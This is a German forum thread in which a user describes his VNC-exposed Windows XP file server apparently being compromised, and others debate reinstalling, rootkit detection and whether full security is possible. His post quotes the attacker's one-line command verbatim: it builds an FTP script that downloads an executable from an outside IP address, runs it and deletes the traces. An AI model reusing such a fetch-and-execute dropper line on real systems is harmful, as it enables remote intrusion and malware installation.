Masin Al-Dujaili: Sicherheit meines Systems

Hallo Forum,

vll. weiß einer der Mitlesenden mir weiterzuhelfen.

Ich habe mich vorhin mal nichtsahnend an meinen PC gesetzt, den ich als Fileserver in meinem lokalen Netz eingerichtet habe (das klingt übertrieben, es ist eigentlich ein ganz normaler Rechner mit WinXP SP2, wo ich meine Dateien für das lokale Netz ablege). Das lokale Netz hängt über einen DSL-Router der traditionsreichen Firma Zyxel am Netz.

Da ich gelegentlich auch außer Haus auf meinen Rechner schauen wollte, habe ich einen VNC-Server installiert (RealVNC) und die Ports im Router an den Server weitergeleitet (hat zwar nicht geklappt aus irgendwelchen Gründen, aber war mir kein weiteren Gedanken wert). Diese Einstellung habe ich gegen 8:00 Uhr heute morgen vorgenommen. Eine Stunde später gehe ich an den Rechner und sehe, daß eine Eingabeaufforderung geöffnet ist und der Kommandozeilen-FTP-Client eine Verbindung hergestellt hat. Lädt er also gerade eine Datei namens 076.exe herunter, dachte ich mir, das darf doch nicht sein -- also STRG-C. Mit den Worten 'Happy rooting!' verabschiedet sich die Eingabeaufforderung wieder.

Unter 'Ausführen ...' fand ich dann folgende Eingabe, die definitiv nicht von mir stammt:

cmd.exe /c del i&echo open 87.105.205.104 2235 > i&echo user 1 1 >> i &echo get 076.exe >> i &echo quit >> i &ftp -n -s:i &076.exe&del i&exit

Also alle FTP-Befehle erstmal in Datei i, dann ftp.exe mit diesem Skript starten und am Ende wieder beenden. Die Datei 076.exe liegt übrigens nicht auf diesem Host, sie wurde zwar versucht auszuführen, aber es kam zu dem Fehler, daß es sich bei 076.exe nicht um eine gültige Windows-Anwendung handele.

Erstmal fragte ich mich natürlich, ob das Zufall sei, daß der Rechner komische Dinge macht, nachdem ich die Portweiterleitung aktiviert hatte -- den Port 18768 habe ich auch noch weitergeleitet, um mittels Opera Torrents herunterladen zu können. Dann fragte ich mich, ob der Rechner jetzt schon kompromittiert ist. Dazu habe ich ein wenig gegoogelt und diese Seite aufgetan, die mir leider nicht weiterhilft -- aber die Reptile-Meldung war mir mittlerweile jedenfalls schon bekannt.

Als Sofortmaßnahmen habe ich mir den Rootkitrevealer besorgt sowie eine Personal Firewall auf dem Rechner installiert. Ich hoffe, das hilft erstmal, auch wenn es gegen Rootkits wohl ein schwacher Schutz ist, wenn sie erstmal drauf sind.

Ich habe keine Ahnung, wie schlimm das jetzt ist und ob alle Leser meiner Nachricht sich nicht auch gleich infizieren ;-)

Ich danke schon mal im voraus für jedes tröstende Wort als auch für Aufklärung.

Beste Grüße aus Berlin-Lichtenberg
Masin

  1. Mittlerweile habe ich gerausgefunden, daß Anfang des Jahres wohl eine Sicherheitslücke in VNC herausgefunden wurde, die es einem Angreifer ermöglicht, Dinge mit dem Rechner anzustellen -- ein Update soll das Problem beheben. Ich habe wohl eine ganze zeitlang das Update verpennt -- dennoch: Weiß jemand, ob ich das System neu aufsetzen sollte?

    Beste Grüße
    Masin

    1. Ich grüsse den Cosmos,

      Weiß jemand, ob ich das System neu aufsetzen sollte?

      Kann man so nicht sagen. Wenn deine Firewall keine ungewöhnlichen Aktivitäten loggt, der Virenscanner nichts findet und das System stabil läuft, _sollte_ das Neuaufsetzen unnötig sein. Eine Garantie gibt es nie.

      Möge das "Self" mit euch sein

      --
      Neulich dachte ich mir, einmal S/M ausprobieren wäre eine tolle Erfahrung. Also hab ich Windows gebootet ...
      1. Ich grüsse den Cosmos,

        Weiß jemand, ob ich das System neu aufsetzen sollte?

        Wenn Du wirklich sicher sein willst: JA

        Kann man so nicht sagen. Wenn deine Firewall keine ungewöhnlichen Aktivitäten loggt, der Virenscanner nichts findet und das System stabil läuft, _sollte_ das Neuaufsetzen unnötig sein. Eine Garantie gibt es nie.

        Blödsinn, wenn sich da ein Rootkit eingepflanzt hat, dann sagen besagte Programme garnix. Rootkits haben die eigenschaft auf der untersten Ebene im Betriebssystem zu arbeiten, Windows selbst merkt nichtmal, dass es Besuch hat.
        Es wurden sogar schon Rootkits gebaut, die Windows komplett in eine virtuelle Maschine verschieben, da hilft garnix mehr, kein RootkitRevealer, RootkitHookanalyzer, Antivirenprogramm oder sonstwas, das Rootkit ist unsichtbar, das ist der Zweck dessen.

        Aber Du hinterlässt immerhin einen Hinweis, dass Du Deiner eigenen Aussage nicht 100% vertraust ;-)

        Möge das "Self" mit euch sein

        Ave SELF!
        & Gruß Basti 8-)

        1. Ich grüsse den Cosmos,

          Aber Du hinterlässt immerhin einen Hinweis, dass Du Deiner eigenen Aussage nicht 100% vertraust ;-)

          Das hätte auch für deine erste Aussage gelten sollen. Denn "wirklich sicher" gibt es nicht. Du kannst lediglich die Gefahr minimieren.

          Möge das "Self" mit euch sein

          --
          Neulich dachte ich mir, einmal S/M ausprobieren wäre eine tolle Erfahrung. Also hab ich Windows gebootet ...
          1. Ich grüsse den Cosmos,

            Aber Du hinterlässt immerhin einen Hinweis, dass Du Deiner eigenen Aussage nicht 100% vertraust ;-)

            Das hätte auch für deine erste Aussage gelten sollen. Denn "wirklich sicher" gibt es nicht. Du kannst lediglich die Gefahr minimieren.

            Na klar, wenn ich von einer sauberen Installations-CD boote und mittels des Partitionierungsprogramms selbiger die Platte plätte, dann ist das System sauber, 100% oder was meinst Du, könnte diese Aktion überleben?

            Möge das "Self" mit euch sein

            Gruß Basti

            1. Ich grüsse den Cosmos,

              100% oder was meinst Du, könnte diese Aktion überleben?

              Ja, genau solange, bist du das erste mal eine Diskette einlegst, eine DVD/CD, einen Speicherstick anschliesst oder mit dem Internet verbindest. Dann ist es vorbei mit den 100%.

              _Das_ meinte ich damit.

              Möge das "Self" mit euch sein

              --
              Neulich dachte ich mir, einmal S/M ausprobieren wäre eine tolle Erfahrung. Also hab ich Windows gebootet ...
              1. Ich grüsse den Cosmos,

                100% oder was meinst Du, könnte diese Aktion überleben?

                Ja, genau solange, bist du das erste mal eine Diskette einlegst, eine DVD/CD, einen Speicherstick anschliesst oder mit dem Internet verbindest. Dann ist es vorbei mit den 100%.

                _Das_ meinte ich damit.

                Ja gut. Ausgehend von einem Otto-Normal-DAU will ich Dir da nicht widersprechen ;-)

                Alle anderen sichern Ihr System adäquat gegen Viren (cd/dvd, Speicherstick, Diskette(???*)) und Gesocks aus dem Web.

                * Disketten gibts noch und werden sogar noch benutzt?? ;-)

                Möge das "Self" mit euch sein

                Gruß Basti

                1. Ich grüsse den Cosmos,

                  Alle anderen sichern Ihr System adäquat gegen Viren (cd/dvd, Speicherstick, Diskette(???*)) und Gesocks aus dem Web.

                  Und selbst wenn du jedes Update, alle Sicherheitsmassnahmen und jegliche Paranoia berücksichtigst, ist 100% Sicherheit immer noch unmöglich.

                  Selbst bei Securitysuiten und "richtigen" Firewalls gibt es Sicherheitslücken

                  * Disketten gibts noch und werden sogar noch benutzt?? ;-)

                  Zumindest hab ich davon gehört ;)

                  Möge das "Self" mit euch sein

                  --
                  Neulich dachte ich mir, einmal S/M ausprobieren wäre eine tolle Erfahrung. Also hab ich Windows gebootet ...
                2. Hallo,

                  * Disketten gibts noch und werden sogar noch benutzt?? ;-)

                  natürlich! Für zwei meiner Rechner ist das (abgesehen von der Harddisk) immer noch die einzige Bootmöglichkeit. Und wenn ich einen neuen Rechner bekomme, der kein Floppy-Laufwerk hat, ist das das erste, was ich nachrüste. Auf Verdacht. Man kann nie wissen.

                  Ich suche aus Nostalgie immer noch ein 8"-Floppylaufwerk. Wär schön, wenn's noch funktionstüchtig ist, muss aber nicht sein. :)

                  So long,
                   Martin

                  --
                  Das Gehirn ist schon eine tolle Sache: Es fängt ganz von allein an zu arbeiten, wenn man morgens aufsteht, und hört erst damit auf, wenn man in der Schule ankommt.
                    (alte Schülererkenntnis)